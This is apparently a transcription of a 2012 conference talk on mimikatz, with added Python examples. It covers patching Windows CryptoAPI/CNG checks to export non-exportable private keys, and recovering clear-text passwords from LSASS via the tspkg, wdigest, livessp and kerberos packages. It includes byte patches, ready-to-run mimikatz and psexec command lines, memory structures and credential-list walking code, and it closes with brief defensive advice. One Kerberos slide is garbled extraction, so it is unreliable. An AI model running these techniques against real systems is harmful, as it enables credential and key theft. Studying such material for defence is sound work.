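        code[off] = 0xEB                                    # 75 rel8 -> EB rel8
        written = 1
    else:
        raise ValueError(f"{mnemonic} at {base + off:#010x} is not a jnz")
    if decode_branch(code, base, off)[2] != target:
        raise RuntimeError("patch moved the branch target")
    return written


def find_unique(code, signature):
    """Locate a byte signature and refuse ambiguous matches (a blind patcher's minimum check)."""
    first = code.find(signature)
    if first < 0 or code.find(signature, first + 1) >= 0:
        raise ValueError("signature not found exactly once")
    return first


# Constructed images: 0xCC filler around the instruction bytes the slides show. The module
# bases are assumptions chosen so that the offsets land on the slide addresses.
RSAENH_BASE = 0x0AC00000
RSAENH_SIGS = (b"\x0F\x85\x33\xC7\xFF\xFF",                 # .text:0AC0B7CB in CPExportKey
               b"\x0F\x85\xB6\x3B\xFF\xFF")                 # .text:0AC1F749
NCRYPT_BASE = 0x6C810000
NCRYPT_SIG = b"\x75\x1C"                                    # .text:6C815210 in SPCryptExportKey


def sample_rsaenh():
    code = bytearray(b"\xCC" * 0x20000)
    code[0xB7CB:0xB7D1] = RSAENH_SIGS[0]
    code[0x1F749:0x1F74F] = RSAENH_SIGS[1]
    return RSAENH_BASE, code


def sample_ncrypt():
    code = bytearray(b"\xCC" * 0x6000)
    code[0x5210:0x5212] = NCRYPT_SIG
    return NCRYPT_BASE, code


def patch_capi(code):
    """The crypto::patchcapi edit: both CPExportKey checks, in the caller's own process."""
    return sum(patch_jnz_to_jmp(code, RSAENH_BASE, find_unique(code, sig)) for sig in RSAENH_SIGS)


def patch_cng(code):
    """The crypto::patchcng edit: one check in SPCryptExportKey (for real: LSASS memory, via WriteProcessMemory)."""
    return patch_jnz_to_jmp(code, NCRYPT_BASE, find_unique(code, NCRYPT_SIG))


if __name__ == "__main__":
    base, code = sample_rsaenh()
    print("capi bytes written:", patch_capi(code), decode_branch(code, base, 0xB7CB))
    base, code = sample_ncrypt()
    print("cng bytes written:", patch_cng(code), decode_branch(code, base, 0x5210))
```

On a real module a two-byte signature such as 75 1C is far from unique, which is why find_unique refuses to patch on an ambiguous match: the tool has to anchor on a longer pattern or on a symbol (the deck found these sites with symbols) before writing anything, and in LSASS a wrong write is a crash, not a failed export.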
mimikatz :: crypto :: patchcng - demo time

Import, export, import as not exportable... export again!
mimikatz :: crypto :: patchcng - limitations

The patch operation needs some privileges:
  - Admin (debug privilege)
  - SYSTEM

mimikatz crypto::patchcng only deals with:
  - Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates... even those that are exportable (hu?)
  - certutil can...
mimikatz :: crypto :: patchcng - bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
  - until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for the export work too
  - yeah, like the good old certutil

Before the patch (output translated from French):

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
  MY
  ================ Certificate 1 ================
  [...]
  Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Provider = Microsoft Software Key Storage Provider
  Private key is NOT exportable
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.

After the patch:

  C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
  MY
  ================ Certificate 1 ================
  [...]
  Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
    Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Provider = Microsoft Software Key Storage Provider
  Encryption test passed
  CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto - memo

Some commands:
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
  - PFX files are protected by this password: mimikatz

Keys
  - When you import a certificate several times, exportable or not, Windows makes duplicate keys
  - When you delete a certificate, Windows does not delete its private key... funny, isn't it?
    * So yes, mimikatz can export it
mimikatz :: crypto - what we can do

Exactly the same as for sekurlsa: it will prevent access to accounts/computers
  - no admin, no admin, no admin...

Basics
  - Use smartcards/tokens for user certificates
  - Use Hardware Security Modules (HSM), even SoftHSM

More in depth
  - See what Microsoft can do with the TPM from Windows 8
    * Virtual SmartCard seems promising
  - Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
    * Their biometrics stuff was a little buggy ;)
mimikatz - what else can it do?

  - Play with minesweeper
  - Manipulate some handles
  - Pass the hash
  - Dump SAM / AD
  - Stop event monitoring
  - Patch Terminal Server
  - Basic GPO bypass
  - Applocker / SRP bypass
  - Driver
    * Play with tokens & privileges
    * Display SSDT x86 & x64
    * List minifilters actions
    * List Notifications (process, thread, image, registry)
    * List Objects hooks and procedures
    * ...
  - ...
mimikatz - that's all folks

Thanks to / Merci à:
  - my girlfriend for her support (her LSASS crashed a few times)
  - Application Security Forum for offering me this great opportunity
    * Partners and Sponsors, for sure
  - Microsoft, for always considering it normal/acceptable
  - Security friends/community for their ideas & challenges
    * nagual, newsoft, mubix, ...
  - You, for your attention

Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact

  blog     : http://blog.gentilkiwi.com
  mimikatz : http://blog.gentilkiwi.com/mimikatz
  source   : https://code.google.com/p/mimikatz
  email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa - history of « pass-the-* » 1/2

Pass-the-hash
  - 1997 - Unix: modified SAMBA client for hash usage, Paul Ashton (EIGEN)
  - 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
  - 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
  - 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
  - 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French, so not famous ;))
2007 was the year of pass the hash!

Pass-the-ticket
  - 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa - history of « pass-the-* » 2/2

Pass-the-pass
  - 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
    * http://blog.gentilkiwi.com/securite/pass-the-pass
  - 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
    * http://blog.gentilkiwi.com/securite/re-pass-the-pass
  - 05/2011 - Some organizations opened cases with Microsoft about it...
  ...Lots of time...
  - beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
  - 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction...
    * http://seclists.org/pen-test/2012/Mar/7
  - 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
    * http://blog.gentilkiwi.com/securite/rere-pass-the-pass
  - 03/2012 - yeah, once again... more curious, but Kerberos keeps passwords in memory
    * http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
  - 08/2012 - sekurlsa module without injection at all (ultra safe)
    * http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes the hash is not enough...
mimikatz :: sekurlsa :: tspkg - what is it?

Microsoft introduced SSO capability for Terminal Server with NT 6, to improve the RemoteApps and Remote Desktop users' experience
  - http://technet.microsoft.com/library/cc772108.aspx

Relies on CredSSP with Credentials Delegation (= Account delegation)
  - Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression: it seems cool!
  - The user does not have to type their password
  - The password is not in the RDP file
  - The password is not in the user's secrets
mimikatz :: sekurlsa :: tspkg - questions

The KB says that for it to work we must enable « Default credentials » delegation
  - "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
    * What? Our User/Domain/Password? | Hash? | Ticket? It seems...
  - In all cases the system seems to be vulnerable to pass-the-...

In what form? Our specs, [MS-CSSP]:
  - 2.2.1.2.1 TSPasswordCreds
    * The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).

      TSPasswordCreds ::= SEQUENCE {
          domainName  [0] OCTET STRING,
          userName    [1] OCTET STRING,
          password    [2] OCTET STRING
      }

  - Challenge/response for authentication?
    * Server: YES (TLS, Kerberos)
    * Client: NO, the password is sent to the server...

So the password resides somewhere in memory!
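Added example (not from the deck and not [MS-CSSP] reference code): a minimal DER encoder and decoder for the TSPasswordCreds structure quoted above, with the explicit context tags [0], [1], [2] around OCTET STRINGs and UTF-16LE strings as a Windows client sends them. The sample values are constructed (the account from the deck's demo). The decoder is the whole of what the server side, or anyone who reads the client's buffer before the TLS/SPNEGO wrap of TSCredentials, needs to get the password back: there is no client-side challenge/response, the password itself is in the blob.

```python
def _der_length(n):
    """DER length octets: short form below 0x80, else 0x8N followed by N big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _der_length(len(body)) + body


def encode_ts_password_creds(domain_name, user_name, password):
    """TSPasswordCreds ::= SEQUENCE { domainName [0] OCTET STRING, userName [1] OCTET STRING, password [2] OCTET STRING }
    Context tags are explicit (A0/A1/A2 wrapping an OCTET STRING); strings are UTF-16LE."""
    fields = (domain_name, user_name, password)
    body = b"".join(_tlv(0xA0 | i, _tlv(0x04, f.encode("utf-16-le"))) for i, f in enumerate(fields))
    return _tlv(0x30, body)


def _read_tlv(buf, pos):
    """Parse one TLV at pos; return (tag, value, position after it), rejecting truncated input."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad DER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    end = pos + length
    if end > len(buf):
        raise ValueError("DER value runs past end of buffer")
    return tag, buf[pos:end], end


_FIELD_NAMES = {0xA0: "domainName", 0xA1: "userName", 0xA2: "password"}


def decode_ts_password_creds(blob):
    """Recover the three strings from a TSPasswordCreds blob; every field must be present exactly once."""
    tag, seq, end = _read_tlv(blob, 0)
    if tag != 0x30 or end != len(blob):
        raise ValueError("expected exactly one SEQUENCE")
    out, pos = {}, 0
    while pos < len(seq):
        ctag, inner, pos = _read_tlv(seq, pos)
        if ctag not in _FIELD_NAMES or _FIELD_NAMES[ctag] in out:
            raise ValueError(f"unexpected or repeated tag {ctag:#x}")
        itag, octets, iend = _read_tlv(inner, 0)
        if itag != 0x04 or iend != len(inner):
            raise ValueError("expected a single OCTET STRING inside the context tag")
        out[_FIELD_NAMES[ctag]] = octets.decode("utf-16-le")
    if len(out) != 3:
        raise ValueError("missing TSPasswordCreds field")
    return out


def password_from_blob(blob):
    """The server-side view: once TLS (and the wrap of TSCredentials) is off, a DER walk yields the password."""
    return decode_ts_password_creds(blob)["password"]


# Constructed sample using the account shown in the deck's demo.
SAMPLE_BLOB = encode_ts_password_creds("vm-w8-rp-x", "Gentil Kiwi", "waza1234")

if __name__ == "__main__":
    print(SAMPLE_BLOB.hex())
    print(decode_ts_password_creds(SAMPLE_BLOB))
```

The only protection the structure gets is the transport: the TSCredentials carrying it are encrypted with the SPNEGO-negotiated context inside the TLS session, so the server (and the client's own LSASS, which must build the blob) sees the password in clear, which is exactly what tspkg keeps for SSO.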
mimikatz :: sekurlsa :: tspkg - symbols & theory

Let's explore some symbols
  - sounds cool... (thanks Microsoft)

  kd> x tspkg!*clear*
  75016d1c  tspkg!TSObtainClearCreds = <no type information>
  kd> x tspkg!*password*
  75011b68  tspkg!TSDuplicatePassword = <no type information>
  75011cd4  tspkg!TSHidePassword = <no type information>
  750195ee  tspkg!TSRevealPassword = <no type information>
  75012fbd  tspkg!TSUpdateCredentialsPassword = <no type information>
  kd> x tspkg!*locate*
  7501158b  tspkg!TSCredTableLocateDefaultCreds = <no type information>

Let's imagine a scenario:
  - Enumerate all sessions to obtain
    * Username
    * Domain
    * LUID
  - Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
    * TS_CREDENTIAL
  - Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
    * TS_PRIMARY_CREDENTIAL with clear text credentials...
mimikatz :: sekurlsa :: tspkg - workflow

LsaEnumerateLogonSessions, then for each LUID:
  1. RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable with the LUID yields the KIWI_TS_CREDENTIAL
  2. its pTsPrimary points to the KIWI_TS_PRIMARY_CREDENTIAL
  3. LsaUnprotectMemory on the Password field gives the password in clear

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined(_M_IX86)
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg - demo time

sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest - what is it?

"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]"
  - Wikipedia: http://en.wikipedia.org/wiki/Digest_access_authentication

"Common Digest Authentication Scenarios:
  - Authenticated client access to a Web site
  - Authenticated client access using SASL
  - Authenticated client access with integrity protection to a directory service using LDAP"
  - Microsoft: http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool!
  - No password over the network, just hashes
  - No reversible password in Active Directory, hashes for each realm
    * Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest - what is it?

We speak about hashes, but which hashes?
  H = MD5(HA1 : nonce : [...] : HA2)
    * HA1 = MD5(username : realm : password)
    * HA2 = MD5(method : digestURI [...])

Even after login, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon.

The WDigest provider must keep the elements needed to compute responses for different servers:
  - Username
  - Realm (from the server)
  - Password
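Added example (not from the slides): the Digest computation above in code, checked against the RFC 2617 test vector, with the same user answering challenges from two realms. It makes the slide's point concrete: HA1 is bound to the realm the server chooses at challenge time, so a client that kept a single precomputed HA1 could only ever answer that one realm, which is why WDigest retains the password itself. The second realm and its nonce are constructed values.

```python
import hashlib


def _md5(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_ha1(username, realm, password):
    """HA1 = MD5(username:realm:password): the only term that needs the password, and it needs the realm."""
    return _md5(f"{username}:{realm}:{password}")


def digest_ha2(method, uri):
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return _md5(f"{method}:{uri}")


def digest_response(ha1, nonce, nc, cnonce, qop, ha2):
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2), RFC 2617 with qop=auth."""
    return _md5(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def answer_challenge(username, password, challenge, method, uri, cnonce, nc="00000001"):
    """What a client holding the password does: the realm arrives with the challenge, HA1 is derived then."""
    ha1 = digest_ha1(username, challenge["realm"], password)
    return digest_response(ha1, challenge["nonce"], nc, cnonce, "auth", digest_ha2(method, uri))


def answer_with_cached_ha1(ha1, challenge, method, uri, cnonce, nc="00000001"):
    """What a client that kept only one precomputed HA1 can do: no password, so the realm is baked in."""
    return digest_response(ha1, challenge["nonce"], nc, cnonce, "auth", digest_ha2(method, uri))


# RFC 2617 section 3.5 example (published vector).
RFC_USER, RFC_REALM, RFC_PASSWORD = "Mufasa", "testrealm@host.com", "Circle Of Life"
RFC_CHALLENGE = {"realm": RFC_REALM, "nonce": "dcd98b7102dd2f0e8b11d0f600bfb0c093"}
RFC_CNONCE, RFC_URI = "0a4f113b", "/dir/index.html"

# Constructed second server: same user and password, different realm and nonce.
OTHER_CHALLENGE = {"realm": "intranet.example", "nonce": "0123456789abcdef0123456789abcdef"}


def compare_realms():
    """Per realm: the response computed from the password, and the one from an HA1 cached for the RFC realm."""
    cached = digest_ha1(RFC_USER, RFC_REALM, RFC_PASSWORD)
    out = {}
    for challenge in (RFC_CHALLENGE, OTHER_CHALLENGE):
        out[challenge["realm"]] = {
            "from_password": answer_challenge(RFC_USER, RFC_PASSWORD, challenge, "GET", RFC_URI, RFC_CNONCE),
            "from_cached_ha1": answer_with_cached_ha1(cached, challenge, "GET", RFC_URI, RFC_CNONCE),
        }
    return out


if __name__ == "__main__":
    for realm, r in compare_realms().items():
        print(realm, "cached HA1 works" if r["from_password"] == r["from_cached_ha1"] else "cached HA1 fails")
```

Advanced Digest does the same trade on the server side: the directory stores one HA1 per realm instead of the password, which only works because a server knows its own realms in advance, something a client facing arbitrary servers does not.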
mimikatz :: sekurlsa :: wdigest - theory

This time we know:
  - that WDigest keeps the password in memory « by protocol », for the HA1 digest
  - that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)

LsaUnprotectMemory
  - At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
  - Let's search for it in WDigest:
      .text:7409D151  _DigestCalcHA1@8          call dword ptr [eax+0B4h]
  - Hypothesis seems verified

LsaProtectMemory
  - At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
  - Let's search for it in WDigest:
      .text:74096C69  _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
  - SpAcceptCredentials takes the clear password in its arguments
    * protects it with LsaProtectMemory
    * updates or inserts data in the doubly-linked list wdigest!l_LogSessList
mimikatz :: sekurlsa :: wdigest - workflow

LsaEnumerateLogonSessions, then for each LUID:
  1. search the doubly-linked list wdigest!l_LogSessList for the KIWI_WDIGEST_LIST_ENTRY whose LocallyUniqueIdentifier matches
  2. LsaUnprotectMemory on its Password field gives the password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    [...]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest - demo time

sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp - how?

Actually, I've only used a logical (empirical) approach to search for passwords...
  - Protocol reading
  - Symbols searching
~ Boring ~ ... let's be more brutal this time: make a WinDbg trap!

  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
      DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
      Image: lsass.exe

  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context
  to be switched. When the debugger breaks in again, you will be in
  the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc              int     3
  0: kd> .reload /user
  Loading User Symbols
  0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
  0: kd> g
mimikatz :: sekurlsa :: livessp - how?

Let's login with a Live account on Windows 8. The trap (kc 5 at each LsaProtectMemory call) shows who protects what:

  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2
  livessp!SpiLogonUserEx2            <- our LiveSSP provider

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials         <- yeah! Pass the Hash capability with a Live account too...

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials          <- a Live user can logon through RDP via SSO

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest):

  1: kd> uf /c livessp!LsaApLogonUserEx2
  livessp!LsaApLogonUserEx2 (74781536)
  [...]
    livessp!LsaApLogonUserEx2+0x560 (74781a96):
      call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp - workflow

LsaEnumerateLogonSessions, then for each LUID:
  1. search the doubly-linked list livessp!LiveGlobalLogonSessionList for the KIWI_LIVESSP_LIST_ENTRY whose LocallyUniqueIdentifier matches
  2. its suppCreds points to the KIWI_LIVESSP_PRIMARY_CREDENTIAL
  3. LsaUnprotectMemory on the Password field gives the password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0; PVOID unk1; PVOID unk2; PVOID unk3;
    DWORD unk4; DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
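Added example (not mimikatz code) of the list walk shared by the wdigest, livessp and kerberos (nt5) workflows: given a captured memory region and its base address, follow the circular LIST_ENTRY chain from the head, match the LUID, dereference the LSA_UNICODE_STRINGs with bounds checks, and "unprotect" the password. The image is constructed, 32-bit, and uses a fixed entry layout (Flink, Blink, UsageCount, This, LUID, then the three strings) that leaves out the unknown fields the structs above elide; the base address and the XOR "protection" are stand-ins, the real decryption being LsaUnprotectMemory with the RC4/DESX or 3DES/AES keys from the LsaEncryptMemory slides. None of that is the deck's data.

```python
import struct

# Layout of the constructed region (32-bit, like the x86 structures in the slides). Assumptions.
BASE = 0x00200000            # pretend virtual address of the captured region
ENTRY_LUID = 0x10            # offset of LocallyUniqueIdentifier in an entry
ENTRY_USER = 0x18            # LSA_UNICODE_STRING UserName
ENTRY_DOMAIN = 0x20          # LSA_UNICODE_STRING Domaine
ENTRY_PASSWORD = 0x28        # LSA_UNICODE_STRING Password
XOR_KEY = 0x5A               # toy stand-in for the LSASS protection key


class Image:
    """A captured memory region plus its original base, so pointers read from it can be followed."""

    def __init__(self, base, size):
        self.base, self.data = base, bytearray(size)

    def read(self, va, n):
        off = va - self.base
        if n < 0 or off < 0 or off + n > len(self.data):
            raise ValueError(f"pointer {va:#x} (+{n}) outside captured region")
        return bytes(self.data[off:off + n])

    def write(self, va, blob):
        self.read(va, len(blob))                 # reuse the bounds check
        self.data[va - self.base:va - self.base + len(blob)] = blob

    def u32(self, va):
        return struct.unpack("<I", self.read(va, 4))[0]


def unprotect(blob):
    """Stand-in for LsaUnprotectMemory (real LSASS: RC4/DESX on NT5, 3DES/AES on NT6)."""
    return bytes(b ^ XOR_KEY for b in blob)


def read_lsa_unicode_string(img, va):
    """LSA_UNICODE_STRING = {USHORT Length; USHORT MaximumLength; PWSTR Buffer}, Length in bytes."""
    length, maximum, buf = struct.unpack("<HHI", img.read(va, 8))
    if length > maximum or length % 2:
        raise ValueError(f"corrupt LSA_UNICODE_STRING at {va:#x}")
    return img.read(buf, length) if length else b""


def find_creds(img, head_va, luid):
    """Walk the circular LIST_ENTRY list (wdigest!l_LogSessList style) for the session with this LUID."""
    seen = set()
    cur = img.u32(head_va)                       # head.Flink
    while cur != head_va:
        if cur in seen:
            raise ValueError("corrupt list: cycle that never returns to the head")
        seen.add(cur)
        (entry_luid,) = struct.unpack("<Q", img.read(cur + ENTRY_LUID, 8))
        if entry_luid == luid:
            return {
                "UserName": read_lsa_unicode_string(img, cur + ENTRY_USER).decode("utf-16-le"),
                "Domaine": read_lsa_unicode_string(img, cur + ENTRY_DOMAIN).decode("utf-16-le"),
                "Password": unprotect(read_lsa_unicode_string(img, cur + ENTRY_PASSWORD)).decode("utf-16-le"),
            }
        cur = img.u32(cur)                       # entry.Flink is the first field
    return None


def build_sample_image():
    """Constructed sample: a list head and two logon sessions (sample data, not a real dump)."""
    img = Image(BASE, 0x400)
    head = BASE + 0x000
    entries = [BASE + 0x100, BASE + 0x200]
    pool = [BASE + 0x300]                        # bump allocator for the string buffers

    def put(text, protect=False):
        raw = text.encode("utf-16-le")
        if protect:
            raw = unprotect(raw)                 # XOR is its own inverse
        va = pool[0]
        img.write(va, raw)
        pool[0] += len(raw)
        return struct.pack("<HHI", len(raw), len(raw), va)

    sessions = [(234870, "Gentil Kiwi", "vm-w8-rp-x", "waza1234"),
                (999, "SYSTEM", "NT AUTHORITY", "")]
    for i, (luid, user, domain, password) in enumerate(sessions):
        va = entries[i]
        flink = entries[i + 1] if i + 1 < len(entries) else head
        blink = entries[i - 1] if i else head
        img.write(va, struct.pack("<IIII", flink, blink, 1, va))   # Flink, Blink, UsageCount, This
        img.write(va + ENTRY_LUID, struct.pack("<Q", luid))
        img.write(va + ENTRY_USER, put(user))
        img.write(va + ENTRY_DOMAIN, put(domain))
        img.write(va + ENTRY_PASSWORD, put(password, protect=True))
    img.write(head, struct.pack("<II", entries[0], entries[-1]))    # head.Flink, head.Blink
    return img, head


if __name__ == "__main__":
    image, head_va = build_sample_image()
    print(find_creds(image, head_va, 234870))
```

The two checks that matter when this runs against a real dump rather than a live, injected process are the ones a debugger would otherwise do for you: every pointer is validated against the captured region before it is dereferenced, and the walk refuses a cycle that does not return to the head, so a stale or partially overwritten list fails loudly instead of looping.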
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos

Let's login with a normal account. The trap shows the Kerberos package protecting twice, once for a key and once for the password:

  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials       <- Kerberos ticket part? Maybe ;)

  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials       <- Kerberos part for the password

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

After credentials protection, KerbCreateLogonSession calls:
  - NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
  - NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz # sekurlsa :: kerberos (nt5) / workflow
Workflow (from the slide diagram): LsaEnumerateLogonSessions -> for each LUID -> search the kerberos!KerbLogonSessionList linked list for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear.
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
